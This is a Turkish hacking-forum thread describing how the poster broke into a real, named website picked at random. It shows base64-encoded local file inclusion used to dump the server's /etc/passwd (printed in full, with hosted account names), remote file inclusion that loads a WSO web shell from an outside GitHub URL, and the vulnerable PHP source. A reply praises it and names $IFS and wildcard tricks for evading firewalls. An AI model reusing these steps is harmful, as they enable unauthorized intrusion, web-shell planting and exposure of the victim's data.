awfatech.com nasıl heklendi (1 Viewer)

X

x

WBt8V7lZm8.PNG

firmayi bilmiyorum rasgele geldi

url inceleme amk #1
https://mrsm.awfatech.com/kklawang/p.php?p=Y29udGFjdC5waHA= >> Y29udGFjdC5waHA= >> contact.php
deneme amk #2
https://mrsm.awfatech.com/kklawang/p.php?p=L2V0Yy9wYXNzd2Q= >> L2V0Yy9wYXNzd2Q= >> /etc/passwd

Code: 
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin avahi-autoipd:x:170:170:Avahi IPv4LL Stack:/var/lib/avahi-autoipd:/sbin/nologin systemd-bus-proxy:x:999:997:systemd Bus Proxy:/:/sbin/nologin systemd-network:x:998:996:systemd Network Management:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin polkitd:x:997:995:User for polkitd:/:/sbin/nologin tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin named:x:25:25:Named:/var/named:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin dovecot:x:97:97:Dovecot IMAP server:/usr/libexec/dovecot:/sbin/nologin dovenull:x:996:994:Dovecot's unauthorized user:/usr/libexec/dovecot:/sbin/nologin mailnull:x:47:47:Exim:/var/spool/mqueue:/bin/false mailman:x:995:992:GNU Mailing List Manager:/usr/local/cpanel/3rdparty/mailman:/bin/bash cpanelroundcube:x:201:201::/var/cpanel/userhomes/cpanelroundcube:/usr/local/cpanel/bin/noshell cpanelphpmyadmin:x:994:991:phpMyAdmin for cPanel & WHM:/var/cpanel/userhomes/cpanelphpmyadmin:/usr/local/cpanel/bin/noshell cpanelphppgadmin:x:993:990:phpPgAdmin for cPanel & WHM:/var/cpanel/userhomes/cpanelphppgadmin:/usr/local/cpanel/bin/noshell cpanel:x:202:202::/var/cpanel/userhomes/cpanel:/usr/local/cpanel/bin/noshell cpanelcabcache:x:203:203::/var/cpanel/userhomes/cpanelcabcache:/usr/local/cpanel/bin/noshell cpanelrrdtool:x:204:204::/var/cpanel/userhomes/cpanelrrdtool:/usr/local/cpanel/bin/noshell mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/false cpanellogin:x:992:989::/var/cpanel/userhomes/cpanellogin:/usr/local/cpanel/bin/noshell cpaneleximfilter:x:991:988::/var/cpanel/userhomes/cpaneleximfilter:/usr/local/cpanel/bin/noshell cpaneleximscanner:x:990:987::/var/cpanel/userhomes/cpaneleximscanner:/usr/local/cpanel/bin/noshell cpanelconnecttrack:x:989:986::/var/cpanel/userhomes/cpanelconnecttrack:/usr/local/cpanel/bin/noshell cpanelanalytics:x:988:985::/var/cpanel/userhomes/cpanelanalytics:/usr/local/cpanel/bin/noshell cpses:x:987:984::/var/cpanel/cpses:/sbin/nologin clamav:x:1000:1002::/home/clamav:/sbin/nologin my07:x:1001:1003::/home/my07:/bin/bash ehalal:x:1002:1004::/home/ehalal:/bin/bash pitas:x:1003:1005::/home/pitas:/bin/bash mystrata:x:1004:1006::/home/mystrata:/bin/bash tahfiz:x:1005:1007::/home/tahfiz:/bin/bash asis:x:1006:1008::/home/asis:/bin/bash eboss:x:1007:1009::/home/eboss:/bin/bash kindy:x:1008:1010::/home/kindy:/bin/bash travel:x:1009:1011::/home/travel:/bin/bash mrsm:x:1010:1012::/home/mrsm:/bin/bash haluan:x:1011:1013::/home/haluan:/bin/bash emasjid:x:1012:1014::/home/emasjid:/bin/bash gpos:x:1013:1015::/home/gpos:/bin/bash rrpahang:x:1014:1016::/home/rrpahang:/bin/bash mobigate:x:1015:1017::/home/mobigate:/bin/bash ekafaperak:x:1016:1018::/home/ekafaperak:/bin/bash jais:x:1017:1019::/home/jais:/bin/bash smartmasjid:x:1019:1021::/home/smartmasjid:/bin/bash marketplace:x:1020:1022::/home/marketplace:/bin/bash ga:x:1022:1024::/home/ga:/bin/bash gposmy:x:1023:1025::/home/gposmy:/bin/bash mall:x:1025:1027::/home/mall:/bin/bash jomalbaghdadi:x:1026:1028::/home/jomalbaghdadi:/bin/bash ipfms:x:1028:1030::/home/ipfms:/bin/bash ksarawak:x:1030:1032::/home/ksarawak:/bin/bash infaq:x:1031:1033::/home/infaq:/bin/bash mallalbaghdadi:x:1032:1034::/home/mallalbaghdadi:/bin/bash

amk nasıl shell atacağız /p.php?p=Y29udGFjdC5waHA= >> Y29udGFjdC5waHA= >> contact.php görüyorsunuz base64 Y29udGFjdC5waHA >> contact.php bir rfi test edelim ama base64.

https://mrsm.awfatech.com/kklawang/...sL21hc3Rlci94YWtlcC1zaGVsbHMvUEhQL3dzby50eHQ= >> https://raw.githubusercontent.com/tennc/webshell/master/xakep-shells/PHP/wso.txt

WORK AMK! daha sonra link mi eklersiniz index mi atarsınız yoksa benim gibi hiçbir şey yapmayıp 31 mi çekersiniz bilemem.

have a nice day bros.

PHP: 
<?php
$p=base64_decode($_REQUEST['p']);
include("$p");
?>

p.php kaynak kodları.
 
Last edited by a moderator:
Javac37

Javac37

Bug Researcher
Joined
Aug 11, 2019
Credits
0
Rating - 0%
şişko said:
WBt8V7lZm8.PNG

firmayi bilmiyorum rasgele geldi

url inceleme amk #1
>> Y29udGFjdC5waHA= >> contact.php
deneme amk #2
>> L2V0Yy9wYXNzd2Q= >> /etc/passwd

Code: 
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin avahi-autoipd:x:170:170:Avahi IPv4LL Stack:/var/lib/avahi-autoipd:/sbin/nologin systemd-bus-proxy:x:999:997:systemd Bus Proxy:/:/sbin/nologin systemd-network:x:998:996:systemd Network Management:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin polkitd:x:997:995:User for polkitd:/:/sbin/nologin tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin named:x:25:25:Named:/var/named:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin dovecot:x:97:97:Dovecot IMAP server:/usr/libexec/dovecot:/sbin/nologin dovenull:x:996:994:Dovecot's unauthorized user:/usr/libexec/dovecot:/sbin/nologin mailnull:x:47:47:Exim:/var/spool/mqueue:/bin/false mailman:x:995:992:GNU Mailing List Manager:/usr/local/cpanel/3rdparty/mailman:/bin/bash cpanelroundcube:x:201:201::/var/cpanel/userhomes/cpanelroundcube:/usr/local/cpanel/bin/noshell cpanelphpmyadmin:x:994:991:phpMyAdmin for cPanel & WHM:/var/cpanel/userhomes/cpanelphpmyadmin:/usr/local/cpanel/bin/noshell cpanelphppgadmin:x:993:990:phpPgAdmin for cPanel & WHM:/var/cpanel/userhomes/cpanelphppgadmin:/usr/local/cpanel/bin/noshell cpanel:x:202:202::/var/cpanel/userhomes/cpanel:/usr/local/cpanel/bin/noshell cpanelcabcache:x:203:203::/var/cpanel/userhomes/cpanelcabcache:/usr/local/cpanel/bin/noshell cpanelrrdtool:x:204:204::/var/cpanel/userhomes/cpanelrrdtool:/usr/local/cpanel/bin/noshell mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/false cpanellogin:x:992:989::/var/cpanel/userhomes/cpanellogin:/usr/local/cpanel/bin/noshell cpaneleximfilter:x:991:988::/var/cpanel/userhomes/cpaneleximfilter:/usr/local/cpanel/bin/noshell cpaneleximscanner:x:990:987::/var/cpanel/userhomes/cpaneleximscanner:/usr/local/cpanel/bin/noshell cpanelconnecttrack:x:989:986::/var/cpanel/userhomes/cpanelconnecttrack:/usr/local/cpanel/bin/noshell cpanelanalytics:x:988:985::/var/cpanel/userhomes/cpanelanalytics:/usr/local/cpanel/bin/noshell cpses:x:987:984::/var/cpanel/cpses:/sbin/nologin clamav:x:1000:1002::/home/clamav:/sbin/nologin my07:x:1001:1003::/home/my07:/bin/bash ehalal:x:1002:1004::/home/ehalal:/bin/bash pitas:x:1003:1005::/home/pitas:/bin/bash mystrata:x:1004:1006::/home/mystrata:/bin/bash tahfiz:x:1005:1007::/home/tahfiz:/bin/bash asis:x:1006:1008::/home/asis:/bin/bash eboss:x:1007:1009::/home/eboss:/bin/bash kindy:x:1008:1010::/home/kindy:/bin/bash travel:x:1009:1011::/home/travel:/bin/bash mrsm:x:1010:1012::/home/mrsm:/bin/bash haluan:x:1011:1013::/home/haluan:/bin/bash emasjid:x:1012:1014::/home/emasjid:/bin/bash gpos:x:1013:1015::/home/gpos:/bin/bash rrpahang:x:1014:1016::/home/rrpahang:/bin/bash mobigate:x:1015:1017::/home/mobigate:/bin/bash ekafaperak:x:1016:1018::/home/ekafaperak:/bin/bash jais:x:1017:1019::/home/jais:/bin/bash smartmasjid:x:1019:1021::/home/smartmasjid:/bin/bash marketplace:x:1020:1022::/home/marketplace:/bin/bash ga:x:1022:1024::/home/ga:/bin/bash gposmy:x:1023:1025::/home/gposmy:/bin/bash mall:x:1025:1027::/home/mall:/bin/bash jomalbaghdadi:x:1026:1028::/home/jomalbaghdadi:/bin/bash ipfms:x:1028:1030::/home/ipfms:/bin/bash ksarawak:x:1030:1032::/home/ksarawak:/bin/bash infaq:x:1031:1033::/home/infaq:/bin/bash mallalbaghdadi:x:1032:1034::/home/mallalbaghdadi:/bin/bash

amk nasıl shell atacağız >> Y29udGFjdC5waHA= >> contact.php görüyorsunuz base64 Y29udGFjdC5waHA >> contact.php bir rfi test edelim ama base64.

>>

WORK AMK! daha sonra link mi eklersiniz index mi atarsınız yoksa benim gibi hiçbir şey yapmayıp 31 mi çekersiniz bilemem.

have a nice day bros.

PHP: 
<?php
$p=base64_decode($_REQUEST['p']);
include("$p");
?>

p.php kaynak kodları.
Click to expand...

Firewalli base64 artarak gecen insan ----->> Medium mind

Firewalli $IFS veya wildcard ile gecen insan ---->> High Mind

Eline saglik :D
 
You must log in or register to reply here.

Users who are viewing this thread

Total: 2 (members: 0, guests: 2)
Top